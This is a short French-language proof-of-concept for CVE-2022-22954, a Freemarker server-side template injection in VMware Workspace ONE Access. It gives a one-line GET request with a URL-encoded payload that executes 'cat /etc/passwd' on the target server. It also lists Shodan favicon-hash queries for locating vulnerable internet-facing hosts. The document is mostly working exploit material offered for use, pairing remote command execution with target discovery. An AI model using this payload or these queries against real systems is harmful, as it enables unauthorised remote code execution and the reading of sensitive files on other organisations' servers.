
Preuve de concept d'exploit pour CVE-2022-22954, une injection de template côté serveur Freemarker dans VMware Workspace ONE Access, avec une requête GET en une ligne et des requêtes Shodan pour la découverte d'hôtes vulnérables.
POC pour Vmware CVE-2022-22954
Utilisez cette requête GET en une ligne !! Cela exécutera cat /etc/passwd
{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
Requête Shodan : http.favicon.hash:-1250474341 http.favicon.hash:-713727389 http.favicon.hash:-1987733375 http.favicon.hash:1459735704 http.favicon.hash:198112565 http.favicon.hash:-1250474341
